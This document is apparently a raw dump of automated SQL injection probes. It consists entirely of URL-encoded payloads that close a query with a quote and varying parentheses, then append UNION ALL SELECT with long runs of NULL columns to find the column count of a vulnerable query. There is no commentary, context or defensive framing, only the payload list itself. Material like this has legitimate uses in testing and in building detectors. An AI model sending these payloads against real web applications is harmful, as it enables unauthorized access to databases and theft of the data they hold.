foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 